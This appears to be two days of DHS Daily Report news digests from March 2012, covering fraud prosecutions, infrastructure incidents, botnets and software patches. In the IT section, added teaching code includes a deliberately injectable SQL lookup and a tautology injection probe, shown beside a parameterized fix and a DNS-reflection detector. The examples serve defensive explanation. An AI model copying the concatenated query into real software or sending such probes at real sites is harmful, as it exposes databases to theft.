Friday, March 30, 2012

Complete DHS Daily Report for March 30, 2012

Daily Report

Top Stories

• The former superintendent of a southern West Virginia mine where an explosion killed 29 workers pleaded guilty March 29 to a federal fraud charge. Prosecutors said he manipulated the mine ventilation system during inspections, and he disabled a methane monitor a few months before the fatal explosion. – Associated Press

1. March 29, Associated Press – (West Virginia) Ex-super pleads guilty in W.Va. mine blast case. The former superintendent of a southern West Virginia mine where an explosion killed 29 workers pleaded guilty March 29 to a federal fraud charge. The highest-ranking Massey Energy official charged in connection with the blast faces up to 5 years in prison when sentenced August 9. Prosecutors said the man manipulated the mine ventilation system during inspections to fool safety officials, and disabled a methane monitor on a cutting machine a few months before the explosion April 5, 2010. It was not clear from court papers whether the device was ever fixed. Prosecutors accused Massey of violating many safety laws out of a desire to put production and profits first. Three investigations concluded the firm allowed highly explosive methane and coal dust to build up inside the mine, where it was ignited by a spark from an improperly maintained piece of cutting equipment. Clogged and broken water sprayers then allowed what could have been just a flare-up to become an epic blast, the investigations found. Source:

• A special agent in charge of Homeland Security investigations warned counterfeit airbags were being sold in the Detroit market and could cause injuries in the event of deployment. – WDIV 4 Detroit

9. March 28, WDIV 4 Detroit – (Michigan) Homeland Security warns counterfeit airbags being sold in Metro Detroit. A special agent in charge of Homeland Security investigations in Michigan and Ohio warned that counterfeit airbags are being sold in the Detroit market and could cause injuries in the event of deployment. “The bag literally explodes, sending shrapnel and dangerous items into the passenger,” he said. Many of the faulty airbags can be bought online for a few hundred dollars, while a real airbag is priced closer to $1,000. The counterfeits either do not deflate when they need to, or they deflate or inflate with such force that the parts become projectiles. Source:

• The head of the National Security Agency and Cyber Command told a U.S. Senate panel that China stole a great deal of the U.S. military’s intellectual property from defense contractors. – CNET News (See item 10)

10. March 28, CNET News – (International) China nabbing ‘great deal’ of U.S. military secrets. Testifying before the U.S. Senate Armed Services Committee March 27, the head of the National Security Agency (NSA) and Cyber Command said China is stealing a “great deal” of the U.S. military’s intellectual property, adding that the NSA sees “thefts from defense industrial base companies.” He confirmed speculation that China was behind 2011’s attacks on RSA. Those attacks proved extremely troublesome for U.S. defense contractors. In 2011, Chinese hackers allegedly stole data related to RSA’s SecurID two-factor authentication devices. Soon after, that information was used to break through security safeguards at defense contractors Lockheed Martin, L-3 Communications, and Northrop Grumman. Source:

• Four U.S. Navy employees and three defense contractors pleaded guilty to a scheme that involved awarding millions of dollars in aircraft maintenance contracts in exchange for bribes. – Associated Press (See item 11)

11. March 28, Associated Press – (California) Navy employees, contractors plead guilty to fraud involving $1 million in bribes in Calif. Four U.S. Navy employees and three defense contractors working near San Diego pleaded guilty to participating in a wide-ranging corruption scheme in which the contractors won millions of dollars in military orders after offering officials massage chairs, bicycles, flat screen TVs, and other bribes, federal officials announced March 28. The civilian employees who worked for a Navy aircraft maintenance program accepted a total of more than $1 million in bribes, a U.S. attorney said. It was unclear if the scheme put national security or military operations at risk. An assistant U.S. attorney said the Navy employees worked for a program tasked with ensuring aircraft were combat ready at the Naval Air Station North Island in Coronado, near San Diego. The four Navy employees worked for the Navy’s Fleet Readiness Center and were assigned to maintaining the Navy’s Grumman E-2 Hawkeye, an early warning aircraft, and the C-2 Greyhound, a derivative of the E-2 that has a widened fuselage with a rear loading ramp. Officials said the Defense Department paid more than $5.5 million in connection with fraudulent invoices submitted by the three defense contractors. Source:

• Firefighters rescued two people who passed through an unlocked gate and scaled several fences to break into a pump house at a water treatment plant in Sacramento, California. – KOVR 13 Sacramento (See item 33)

33. March 28, KOVR 13 Sacramento – (California) Two rescued from pump house near Sac State. A man and a woman who broke into a pump house on the American River near the Sacramento State campus in Sacramento, California, were rescued by fire personnel March 27 and the man was arrested. Sacramento firefighters were dispatched to the pump house after two people became trapped inside after scaling several fences to access the five-story building connected to the Fairbairn Water Treatment Plant. The woman apparently fell into a suction pool inside the pump house and the man was unable to get her out. The woman was taken to a hospital after suffering from hypothermia, and a warrant request for trespassing was submitted for her arrest, according to police. Fire officials said the two appeared to be intoxicated. The water treatment plant has had several security upgrades because water treatment facilities were classified as potential terrorist targets after the September 11th attacks. Firefighters said they walked in through an unlocked gate, but city officials would not say how they got inside and did not comment on security at the facility. Source:


Banking and Finance Sector

12. March 29, Empire State News – (New York) Stolen credit card information used to purchase $100,000 worth of E-ZPass tags. Charges were filed March 28 in New York against two defendants for engaging in a $6 million Internet-based credit card fraud scheme. As part of their scheme, the defendants used stolen credit cards to purchase $100,000 worth of E-ZPass tags and credits, which they then re-sold. They also caused fraudulent charges to be made on stolen credit and debit cards and created a bogus Web site that lured customers into purchasing products that they never received. In total, the pair compromised more than 1,400 credit and debit cards, attempting to charge more than $6 million to these accounts. Both suspects were arrested March 28 at their home in Brooklyn. Source:

13. March 29, Forest Hills Patch – (New York) Alleged Queens Blvd. bandit arrested. Police in the Queens borough of New York City have announced the arrest of a suspect wanted in connection with five bank robberies, three of which happened on Queens Boulevard, the Forest Hills Patch reported March 29. The suspect was arrested and charged with five counts of robbery for his alleged role in a February crime spree that struck four Chase Bank branches and one Capital One Bank. Police have been seeking a suspect since the first incident February 3. Every incident was similar, with the suspect handing a note to the teller then fleeing, with or without cash. Source:

14. March 28, U.S. Department of the Treasury – (International) Treasury announces additional sanctions against Iranian engineering and shipping firms. The U.S. Department of the Treasury announced March 28 additional sanctions against two entities connected to the network of the Islamic Revolutionary Guard Corps (IRGC) and two individuals and two entities affiliated with Iran’s national maritime carrier, the Islamic Republic of Iran Shipping Lines (IRISL). Pursuant to Executive Order 13382, Treasury designated several entities. The order is aimed at freezing the assets of proliferators of weapons of mass destruction and their supporters and thereby isolating them from U.S. financial and commercial systems. Entities designated by Treasury include: Iran Maritime Industrial Company SADRA (SADRA), an entity owned by the IRGC; Deep Offshore Technology PJS, a subsidiary of SADRA; Malship Shipping Agency Ltd., an IRISL affiliate; and Modality Limited, an IRISL affiliate. Source:

15. March 28, West Hawaii Today – (Hawaii) HCFCU admits member information breached. Hawaii Community Federal Credit Union employees improperly accessed the names, addresses, and last four digits of Social Security numbers (SSNs) of “several hundred” Hawaii Community Federal Credit Union members, the credit union’s president said March 27. The data breach happened nearly a year ago. The credit union did not notify members until the week of March 26, while an attorney conducted an investigation, the president said. The credit union posted a letter on its Web site March 23, and mailed it to credit union members late the week of March 19, informing them of the data breach, which the president said happened in April 2011. The credit union has about 40,000 members. Fewer than 500 had their account information accessed, the president said. He said account information and full SSNs were not accessed. A credit union member filed a complaint in 2011 after becoming suspicious. The president said a “handful” of employees were involved in the breach. Disciplinary actions were “up to and including termination,” he added. Information from the investigation has been forwarded to federal authorities, he said. Credit union employees will go through new training to reinforce policies that bar accessing member data. Officials are also reviewing policies and procedures, the president said. Credit union employees will also be able to anonymously report suspicions they have about co-workers who may be improperly accessing information via a new Web site, he added. Source:

16. March 28, U.S. Department of Justice – (National) Justice Department sues national tax preparation firm and franchisees to stop alleged pervasive tax fraud. The United States has filed civil injunction lawsuits in five cities seeking to shut down both the company that operates Instant Tax Service (ITS) as well as five owners of ITS franchises, the Justice Department (DOJ) announced March 28. The government’s complaint accuses ITS Financial and its owner of deliberately ignoring systemic and pervasive fraud by ITS franchisees. The complaints allege franchisees across the country intentionally prepare and file fraudulent tax returns to maximize refunds. They do this so ITS Financial and its franchisees can extract large tax preparation fees and charges. The government claims the fees are outrageously high and are often not disclosed. The franchisees named in the complaints allegedly invent phony businesses, fabricate deductions, falsify filing statuses, claim bogus dependents, and disregard rules for claiming the earned income tax credit. The DOJ alleges ITS employees at these franchises have little tax preparation experience, and that the franchise owners encourage them to prepare fraudulent tax returns. The complaint against ITS Financial states that the estimated tax losses from allegedly fraudulent return preparation in 2011 at ITS locations in St. Louis, the Kansas City area, Chicago, Indianapolis, and Las Vegas exceed $16 million. Source:

17. March 28, U.S. Department of Justice – (Texas) Justice Department seeks to shut down Texas tax return preparer. The United States has sued a tax preparer, seeking to bar him from preparing any federal tax returns for others, the Justice Department announced March 28. The civil injunction suit alleges the DeSoto, Texas man claimed fraudulent deductions and expenses on his customers’ tax returns. He allegedly claimed fake mortgage interest deductions, illegally deducted Social Security taxes as state and local taxes, and fabricated employee business expenses, among other fraudulent items, on his customers’ returns. According to the complaint, the harm to the United States from the preparer’s misconduct could be $7.8 million or more. Source:

18. March 28, Fort Worth Star-Telegram – (Texas) Ex-Bank of America branch manager pleads guilty to fraud. A former Bank of America branch manager in River Oaks, Texas, accused of stealing more than $2 million from customers’ accounts over a 9-year period pleaded guilty March 28 in federal court to one count of bank fraud. She faces anywhere from probation to 30 years in prison and could be ordered to pay a $1 million fine and restitution. Prosecutors allege the former manager used the money she stole for personal expenses, including vacations, clothing, jewelry, and land purchases. According to court documents, the woman was hired at the River Oaks branch in 1996, and was later promoted to personal banker, then assistant branch manager, and finally branch bank manager. Her positions gave her full access to customers’ bank accounts. Beginning around 2002 until April 2011, she withdrew cash from customers’ bank accounts, sometimes forging signatures on withdrawal slips. She would inform tellers that she was withdrawing cash for the customer, sometimes lying by saying the customer was waiting inside her office. Prosecutors said she avoided having to fill out mandatory bank reports by never withdrawing more than $10,000 per transaction. She targeted customers with whom she had had a longstanding relationship, knowing they would likely report any uncovered improper transactions directly to her. She would then refund their accounts with money stolen from other customers’ accounts. Court documents state she prevented bank statements from being sent to customers’ homes by entering codes into the bank’s data system indicating the customers’ addresses were unknown. Source:

19. March 28, Portland Oregonian – (Michigan; National) Portland man ordered to pay back profits from fraudulent investment schemes. A man has been ordered to return profits made from activities that resulted in a series of securities law violations, including his role in a Ponzi scheme that raised $72.6 million from 3,000 investors, the Portland Oregonian reported March 28. A federal judge in Michigan ordered the man to repay investors $4.1 million and to pay a $100,000 civil fine. According to the U.S. Securities and Exchange Commission (SEC), the man had promoted himself on his Web site as a trustworthy investment reviewer since 1997. He recommended some business opportunities, did not recommend others, and warned visitors how to spot and avoid a scam. Starting in 2006, the SEC alleged, he promoted a series of fraudulent schemes, including the Ponzi scheme orchestrated by a Swartz Creek, Michigan man, who paid the defendant $3.8 million for his participation. He promoted other schemes and guaranteed large returns, but had no basis for the claim, the SEC said. Source:

20. March 27, Federal Bureau of Investigation – (National) FBI releases bank crime statistics for third quarter of 2011. During the third quarter of 2011, there were 1,094 reported violations of the Federal Bank Robbery and Incidental Crimes Statute, a decrease from the 1,325 reported violations in the same quarter of 2010, according to statistics released March 27 by the FBI. There were 1,081 robberies, 11 burglaries, 2 larcenies, and 1 extortion of a financial institution reported between July 1, 2011 and September 30, 2011. These statistics were recorded as of October 28, 2011. Source:

Information Technology

40. March 29, H Security – (International) Chrome 18 improves graphics performance, closes security holes. Google released version 18 of Chrome. The new Stable channel release, labelled 18.0.1025.142, closes nine security holes, of which three are rated as “High severity.” These include high-risk use-after-free errors in SVG clipping, an off-by-one problem in OpenType Sanitizer, and memory corruption bugs in Skia. Other closed holes include five medium-severity problems such as out-of-bounds reads in SVG text and text fragment handling, a cross-site scripting bug, a SPDY proxy certificate checking error, and an invalid read in the V8 JavaScript engine. A low-severity bug used by the hacker “Pinkie Pie” during the Pwn2Own competition at CanSecWest was also closed. A Google employee said some of the fixes “represent the start of hardening measures based on study of the exploits submitted to the Pwnium competition.” Source:

41. March 29, The Register – (International) Kelihos zombies erupt from mass graves after botnet massacre. Security researchers warned that the Kelihos botnet targeted by a takedown March 28 is still active. Experts not involved in the operation said the miscreants behind the network of compromised Windows computers are working on their comeback. The zombie PC army was taken offline in September 2011, they said, yet later resurfaced. Seculert reports Kelihos-B, which was distributed as a Facebook worm over recent weeks, is still active and spreading — even after the shutdown attempt by CrowdStrike and Kaspersky Lab March 28. Seculert views this botnet as the undead remnants of Kelihos-B rather than the spawn of a new variant of the malware. The findings suggest sink-holing 109,000 backdoored machines infected with the spam-spewing and credential-stealing Kelihos trojan may not have disabled the entire bot network. Source:

42. March 28, eWeek – (International) iPhone passcodes can be cracked as quickly as XRY. The four-digit password on Apple’s iPhone is no match for Micro Systemation’s XRY application, according to experts. The password on the popular smartphone can probably keep a regular person who finds the device from breaking into it. However, the software from the Swedish company, which it sells to law enforcement agencies, can crack the code on an iPhone or a smartphone running Google’s Android mobile operating system within minutes. XRY essentially jailbreaks the device in the same manner that regular jailbreakers do. It then runs every combination of four-digit passcodes until it hits the right one. Once that happens, all the data on the phone can be accessed, according to the company. Source:

43. March 28, SecurityWeek – (International) Attackers using Taidoor trojan to target think tanks and US-Taiwan interests. In 2008, the Taidoor trojan made its first appearance on the Web. It started by attacking government agencies, but the group behind it expanded their reach by targeting a wide range of victims. Now, based on research from Symantec, it appears the group running Taidoor is interested in think tanks, especially those focused on Taiwan. While Taidoor started out by targeting governments, between 2009 and 2010 the malware shifted gears. Government victims were counted alongside those in the media, financial, telecom, and manufacturing sectors. The length of the attack, almost 4 years now, shows the group responsible for Taidoor is persistent if nothing else. Based on the collected data, Symantec said that since May 2011 there has been a substantial increase in activity. The malware’s current targets are primarily private industry and international think tanks with a direct involvement in United States and Taiwanese affairs. Facilities in the services sector these organizations may use are also targeted. Source:

44. March 28, Dark Reading – (International) Cybercriminals’ love affair with Havij spells SQL injection trouble. Today’s exponential increase in attack volume and complexity can largely be attributed to cybercriminals working smarter with powerful, automated tools. In the database-cracking world, Havij stands as one of the most popular of these tools, and as such it should be on the radar of any security professional seeking to prevent costly data breaches within their environments. “If you’re talking about databases and the tools that are used to perform SQL injection, Havij is one of the most common,” a senior security strategist at Imperva said. Havij was developed by Iranian hackers in the spring of 2010. The tool has so captured the hearts and minds of the black hat community that groups like Anonymous frequently train on how to wreak havoc using it, said the chief technology officer at Application Security, Inc. Favored by hacktivists and financially motivated attackers, Havij automates criminals’ SQL injection attacks by automatically detecting the database behind a targeted Web site, detecting whether it uses a string or integer parameter type, and testing different injection syntaxes. Unlike a lot of penetration tools, Havij can not only point to potential vulnerabilities, it can also carry out data extraction and harvesting. Source:
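The item above says tools like Havij work by fingerprinting whether a Web parameter is treated as a string or an integer and then trying injection syntaxes against it; the only durable defense is to never let user input be parsed as SQL at all. The following is an added illustration, not code from Dark Reading, Imperva, or Application Security, Inc.: a constructed in-memory SQLite table, one lookup that concatenates the input into the query (the pattern such tools look for) and two that bind it as a parameter, with the integer case type-checked before it reaches the driver. The table, the user names, and the probe string are all constructed for the example.

```python
import sqlite3

# Constructed sample data (not from any real system): a tiny table standing in
# for the application database behind a Web form.
SAMPLE_USERS = [
    (1, "alice", "alice-secret"),
    (2, "bob", "bob-secret"),
]


def make_db():
    """Create a fresh in-memory SQLite database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users (id, name, secret) VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(name):
    """String parameter built by concatenation: the input becomes part of the SQL text.

    A quote in the input closes the literal early, so a tautology such as
    x' OR '1'='1 matches every row. This is the weak pattern, kept only for contrast.
    """
    conn = make_db()
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(name):
    """Same query with a bound parameter: the driver sends the value separately,
    so the input is compared as data and never parsed as SQL."""
    conn = make_db()
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def lookup_by_id_hardened(user_id):
    """Integer parameter: reject anything that is not a real int before binding.

    bool is a subclass of int in Python, so it is excluded explicitly.
    """
    if isinstance(user_id, bool) or not isinstance(user_id, int):
        raise TypeError("user_id must be an int")
    conn = make_db()
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    probe = "x' OR '1'='1"  # constructed tautology probe of the kind automated tools send
    print("vulnerable:", lookup_vulnerable(probe))  # every row: ['alice', 'bob']
    print("hardened:  ", lookup_hardened(probe))    # []: nobody is literally named that
    print("by id:     ", lookup_by_id_hardened(2))  # ['bob']
```

The same probe that dumps the whole table through `lookup_vulnerable` returns nothing through `lookup_hardened`, which is the behaviour a reviewer should expect from every query in the code base. Parameter binding (or an ORM that binds underneath) removes the class of bug; input "sanitising" by blacklisting quote characters does not, because the integer-parameter case needs no quote at all.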

45. March 28, Computerworld – (International) Duqu malware resurfaces after four-month holiday. Duqu is back, security researchers said March 28. After a several-month sabbatical, the Duqu makers recompiled one of the trojan’s components in late February, said the manager of operations at Symantec’s security response team. The system driver, which is installed by the malware’s dropper agent, is responsible for decrypting the rest of the already-downloaded package, then loading those pieces into the PC’s memory. Symantec captured a single sample of the driver, which was compiled February 23, 2012. Before that, the last time the Duqu gang updated the driver was October 17, 2011. Duqu has been characterized by Symantec and others as a possible precursor to the next Stuxnet, the ultra-sophisticated worm that sabotaged Iran’s nuclear fuel enrichment program by crippling critical gas centrifuges. The Symantec manager said the functionality of the new driver was “more or less the same” as earlier versions, including the one spotted October 2011 and another from late 2010 that later surfaced. March 27, the leader of Kaspersky’s global research and analysis team said the Duqu driver was probably modified to evade security software and Duqu detection programs. Source:

46. March 27, U.S. Federal Trade Commission – (International) FTC charges that security flaws in RockYou game site exposed 32 million email addresses and passwords. The operator of a social game site agreed to settle charges that, while touting its security features, it failed to protect the privacy of its users, allowing hackers to access the personal information of 32 million users. The Federal Trade Commission (FTC) also alleged in its complaint against RockYou that the company violated the Children’s Online Privacy Protection Act Rule (COPPA Rule) in collecting information from about 179,000 children. The proposed FTC settlement order with the company bars future deceptive claims by the company regarding privacy and data security, requires it to implement and maintain a data security program, bars future violations of the COPPA Rule, and requires it to pay a $250,000 civil penalty to settle the COPPA charges. Source:

For more stories, see item 10 above in Top Stories and items 47 and 48 below in the Communications Sector.

Communications Sector

47. March 28, CSO – (International) Operation Global Blackout: Real danger or irrelevant? Will the hacker group Anonymous make good on its threat to take down the Internet March 31? Probably not. But it could slow it down, according to many security experts. It may depend in part on how unified Anonymous is about the attack. Anonymous threatened retaliation for the arrests of about 25 of its members in February, and is also focused on what its members believe is a continuing threat by Congress to censor the Internet through anti-piracy legislation. Anonymous is daring anyone to stop Operation Global Blackout — the group announced March 31 as the date of the attack, along with the method they intend to use — disabling the Domain Name Service (DNS) through distributed denial of service attacks on the root servers of the DNS with a tool called “ramp,” or “reflective amplification.” Even with the advance warning, a professor in the department of computing at the University of Surrey believes Anonymous could do some damage. In a piece for BBC, he said the top-level DNS systems are in different countries, are monitored by different organizations, and run on different technologies. He said Anonymous could bring a server down with ramp, in which an army of bots spoof the IP address of a target system and, “cause the DNS to flood the very network it is supposed to be serving.” Source:
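The mechanism described above (bots send DNS queries with the source address forged to that of the target, so the resolvers' much larger answers flood the target's network) leaves a recognisable signature at the victim: a large volume of port-53 response traffic from many distinct resolvers, with little or no matching outbound query traffic. The following is an added example from a defender's vantage point, not code from CSO or the researcher quoted; it runs a simple ratio check over constructed flow records (the addresses, ports, and byte counts are all made up for the example) to flag hosts that look like reflection victims.

```python
from collections import defaultdict

# Constructed flow records, not captured traffic: (src_ip, dst_ip, src_port, dst_port, bytes).
# Two ordinary hosts each send a small query to a resolver and get a modest answer back.
# The host 203.0.113.10 receives large answers from twenty resolvers it never queried.
SAMPLE_FLOWS = [
    ("192.0.2.5", "198.51.100.1", 40001, 53, 60),    # normal query to resolver
    ("198.51.100.1", "192.0.2.5", 53, 40001, 120),   # normal answer back
    ("192.0.2.6", "198.51.100.1", 40002, 53, 60),
    ("198.51.100.1", "192.0.2.6", 53, 40002, 200),
] + [
    # unsolicited large answers "returned" to the spoofed target from many resolvers
    ("198.51.100.%d" % i, "203.0.113.10", 53, 40000 + i, 3000) for i in range(2, 22)
]


def dns_reflection_victims(flows, min_resolvers=10, min_amplification=10.0):
    """Return {victim_ip: stats} for hosts whose inbound DNS response bytes dwarf their
    outbound DNS query bytes and that hear from many distinct resolvers.

    min_resolvers and min_amplification are tuning thresholds chosen for this example;
    a real deployment would derive them from a baseline of normal traffic.
    """
    query_bytes = defaultdict(int)      # bytes each host sent to port 53
    response_bytes = defaultdict(int)   # bytes each host received from port 53
    resolvers_seen = defaultdict(set)   # distinct resolvers answering each host

    for src, dst, sport, dport, nbytes in flows:
        if dport == 53:
            query_bytes[src] += nbytes
        elif sport == 53:
            response_bytes[dst] += nbytes
            resolvers_seen[dst].add(src)

    victims = {}
    for host, inbound in response_bytes.items():
        outbound = query_bytes.get(host, 0)
        # a host that sent no queries at all has an unbounded amplification ratio
        ratio = inbound / outbound if outbound else float("inf")
        if len(resolvers_seen[host]) >= min_resolvers and ratio >= min_amplification:
            victims[host] = {
                "resolvers": len(resolvers_seen[host]),
                "inbound_bytes": inbound,
                "outbound_bytes": outbound,
                "amplification": ratio,
            }
    return victims


if __name__ == "__main__":
    for ip, stats in dns_reflection_victims(SAMPLE_FLOWS).items():
        print(ip, stats)   # only 203.0.113.10 is reported
```

The two ordinary hosts are never flagged because each hears from a single resolver and sends roughly as much as it receives, while the spoofed target is reported on both counts. The check is deliberately simple; in practice it would run over a sliding time window, and the complementary mitigation sits on the resolver side (answering recursive queries only for one's own clients and rate-limiting identical responses), since the victim cannot stop traffic that is already arriving.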

48. March 28, Biloxi Sun Herald – (Mississippi) Cut cable silences C Spire phone service. C Spire Wireless customers in south Mississippi lost service March 29 when a fiber-optic cable was cut. A C Spire Wireless spokesman said an independent third party was found to have cut an underground cable, between Seminary and Hattiesburg, resulting in a service outage sometime before noon. Shortly before 4 p.m., he said service had been restored to virtually 100 percent of customers. He could not estimate how many customers lost service. “The primary impact was voice service, although we have gotten some scattered reports from some customers (saying) that they also couldn’t text,” he said. Source:

For more stories, see items 42 and 46 above in the Information Technology Sector.

Thursday, March 29, 2012

Complete DHS Daily Report for March 29, 2012

Daily Report

Top Stories

• The San Onofre nuclear plant near San Diego will remain shut down while investigators try to discover what is causing the rapid decay of generator tubing that carries radioactive water. – Associated Press

6. March 28, Associated Press – (California) Feds: State nuke plant to remain shut for probe. The San Onofre nuclear plant near San Diego will remain shut down while investigators try to solve a mystery inside its massive generators — the rapid decay of tubing that carries radioactive water, federal regulators said March 27. A four-page letter to plant operator Edison from the Nuclear Regulatory Commission regional administrator laid out a series of steps the company must take before restarting the seaside reactors, underscoring the concern over the unusual degradation in the tubes. The administrator wrote that the problems in the generators must be resolved and fixed and “until we are satisfied that has been done, the plant will not be permitted to restart.” The plant’s 4 steam generators each contain nearly 10,000 alloy tubes that carry hot, pressurized water from the reactors. The Unit 3 reactor was shut down as a precaution in January after a tube break, and extensive wear was found on similar tubing in its twin, Unit 2, which has been shut down for maintenance. Source: State nuke plant to remain shut for probe

• The Securities and Exchange Commission sued a former United Commercial Bank vice president, accusing him of creating false records that contributed to the bank’s failure. The collapse cost the federal government $2.5 billion. – Bloomberg See item 9 below in the Banking and Finance Sector.

• A section of railroad in northeastern Indiana that carries up to 100 trains per day was shut for a second day while crews contended with a chemical fire caused by a train derailment. – Fort Wayne Journal Gazette

14. March 28, Fort Wayne Journal Gazette – (Indiana) Derailment, fire prompt evacuation near Ligonier. Officials said a heavily traveled stretch of railroad in northeastern Indiana would likely be closed through March 28, a day after a freight train derailed and spewed molten sulfur that caught fire. Firefighters were still at the site near Ligonier March 28 monitoring the fire caused after 21 cars of the eastbound 59-car Norfolk Southern train derailed. The Noble County sheriff said firefighters decided to let the cars burn because water could wash the chemical into the Little Elkhart River. He said the fire was expected to burn until at least noon March 28. Up to 100 trains, including two Amtrak passenger trains, use the route daily, Norfolk Southern said. It said that trains that normally use the route have been rerouted with other carriers and alternate routes. The train that derailed had 3 locomotives, 43 cars loaded with freight, including 11 with hazardous materials such as molten sulfur and toluene, and 16 empty freight cars. The derailment forced detours of two Amtrak trains carrying about 400 passengers combined. It also forced the evacuation of about six homes in the rural area. Source:

• For the second time in 6 months, researchers from Kaspersky Lab led an operation to take down the newest iteration of the Kelihos botnet. The bot is used to send spam, carry out distributed denial-of-service attacks, and steal online currency. – Threatpost See item 36 below in the Information Technology Sector.


Banking and Finance Sector

9. March 27, Bloomberg – (California; National) SEC sues former United Commercial Bank executive. The Securities and Exchange Commission (SEC) sued a former United Commercial Bank vice president (VP) March 27, accusing him of creating false records tied to the defunct San Francisco-based bank’s evaluation of loan risks. United Commercial, a unit of UCBH Holdings Inc., was seized by regulators in November 2009. It failed following the 2008 credit crisis and caused a $2.5 billion loss to the Federal Deposit Insurance Corporation’s insurance fund, according to the SEC. The VP was in charge of the bank’s commercial banking division, the SEC said. The VP, taking orders from his superiors during the financial crisis, “misstated and omitted material information in documents provided to the bank’s independent auditors,” the SEC said in its complaint. He “altered memoranda addressing the risks associated with certain large loans and the potential losses the bank faced from the loans,” which auditors relied on, according to the complaint. Three former executives at the bank were sued by the SEC in 2011 over claims they misled investors by concealing at least $65 million in loan losses before the lender collapsed. Source:

10. March 27, Burlington Free Press – (Connecticut; Vermont) Chiropractor pleads not guilty to $28 million investment fraud scheme. A Connecticut chiropractor was accused of being a silent partner, but prime beneficiary, in an alleged $28 million investment fraud scheme, the Burlington Free Press reported March 27. A renowned Vermont storyteller was a central fundraiser in the case. According to a federal indictment, the chiropractor induced the Vermont man to raise $28 million for a still-unreleased film. The chiropractor, who was arrested in Connecticut the week of March 19, pleaded not guilty to an 18-count indictment March 27 in a U.S. district court in Burlington, Vermont. He is facing nine wire fraud counts, five mail fraud counts, three money laundering counts, and a single conspiracy count. Court documents allege that most of the investor money the Vermonter raised for the film went to pay off earlier investors. Some of the remainder went into the film project, but an estimated $3.8 million was diverted to the chiropractor. The Vermont man pleaded guilty the week of March 19 to conspiracy to commit wire fraud, and one count of filing a fraudulent tax document. He has agreed to cooperate with the government’s case. Source:

11. March 27, Manchester Union Leader – (New Hampshire) Prosecutors: NH mortgage scam stiffed homeowners. A man accused of running a mortgage scam that duped dozens of people into believing they were saving their homes while he pocketed loan proceeds that he never repaid was on trial March 27 in a U.S. district court in New Hampshire. According to an indictment, the man approached people who were struggling to make mortgage payments from 2005 to 2008. He would offer to take the deed to their property while allowing them to stay in the home. According to prosecutors, part of his scheme would have them pay rent while offering them an option to buy their homes back in 2 years. Instead, he leveraged the properties to take out more loans and would also use agents, or “straws,” who would pose as purchasers and take out mortgages to buy homes from the man’s companies. The loans, which totaled more than $13 million, were never repaid, prosecutors allege. The defendant paid associates and straws with the money, and pocketed much of it, spending it for personal expenses. “When [he] later defaulted on the mortgages and the homes went to foreclosure, the distressed homeowners were not notified because the straws were the owners of record,” the indictment alleged. Meanwhile, the defendant continued collecting rent payments from the homes’ former owners, the indictment said. Source:

For more stories, see items 36 and 39 below in the Information Technology Sector.

Information Technology

35. March 28, Threatpost – (International) Adobe patches Flash Player, unveils new silent updater. Adobe released a security update for its Flash Player March 28, patching two critical holes and introducing a new silent update option. The update, Adobe Flash Player 11.2, addresses two memory corruption vulnerabilities in Windows, Mac, Linux, and early Android builds that could lead to remote code execution according to a bulletin (APSB12-07). Users updating to 11.2 on Windows machines will notice a new background updater for Flash that has been shipped with the patch. After users update Flash, they will be asked how they want to receive Adobe updates going forward. The updater gives three options, including one that will automatically install updates in the background. If selected, the updater will check with Adobe every hour until it receives a response. If there is no available update, the updater will check back 24 hours later. Source:

36. March 28, Threatpost – (International) Kaspersky knocks down Kelihos botnet again, but expects return. For the second time in 6 months, researchers from Kaspersky Lab carried out an operation to take down the newest iteration of the Kelihos botnet, also known as “Hlux.” Microsoft and Kaspersky worked together in September 2011 on the first Kelihos take-down. The bot then resurfaced in January only to be shut down again in March by a combination of private firms including Kaspersky, Dell SecureWorks, and CrowdStrike Inc. Kelihos is used to send spam, carry out distributed denial-of-service attacks, and steal online currency, for example by harvesting bitcoin wallets. It operates as a “peer-to-peer” bot network, a design that is more difficult to take down than a botnet with centralized command and control (C&C) servers, according to a senior researcher at CrowdStrike. Peer-to-peer botnets are distributed, self-organizing, and may have multiple command and control servers that disguise themselves as peers. In Kelihos’s case, there were three C&C servers and each had two unique IP addresses, he said. Source:

37. March 28, H Security – (International) Opera 11.62 closes security holes. Opera released version 11.62 of its Web browser. This maintenance update fixes a number of bugs, improves overall stability, and closes seven security holes, five of which affect all supported platforms. Two of the vulnerabilities are rated as “high” severity and could be exploited by an attacker to download and execute a possibly malicious file. This is done by tricking a victim into clicking a hidden dialog box or into entering a specific keyboard sequence. Three other problems rated as “low” severity, including an address-spoofing bug, an address-bar problem, and a cross-domain information disclosure bug, were also fixed. A moderate vulnerability affecting Opera for Mac and a low-risk bug on Linux/Unix were also corrected. Source:

38. March 28, H Security – (International) Critical Java hole being exploited on a large scale. Criminals are increasingly exploiting a critical hole in the Java Runtime Environment to infect computers with malicious code when users visit a specially crafted Web page. According to a security blogger, the reason for this increased activity is that the arsenal of the BlackHole exploit kit has been extended to include a suitable exploit. The hole patched by Oracle in mid-February allows malicious code to breach the Java sandbox and permanently anchor itself in a system. Varying types of malware are injected; for example, it is believed the hole is exploited to deploy the Zeus trojan. According to an analysis by Microsoft, the dropper is distributed across two Java classes. The first class exploits the vulnerability to elevate its privileges when processing arrays, and then executes a loader class that will download and install the payload. Users can protect themselves by installing or updating to one of the current Java releases: Java SE 6 Update 31 or version 7 Update 3. Source:

39. March 27, Threatpost – (International) Carberp: It’s not over yet. On March 20, Russian law enforcement agencies announced the arrest of a cybercriminal gang involved in stealing money using the Carberp trojan. Evidently, those arrested were just one of the criminal gangs using the trojan. At the same time, those who developed Carberp are still at large, openly selling the trojan on cybercriminal forums. There are still numerous “affiliate programs” involved in the distribution of Carberp, particularly “traffbiz(dot)ru.” In short, those responsible for developing Carberp remain at large and the cybercriminal gangs using the trojan remain active. Source:

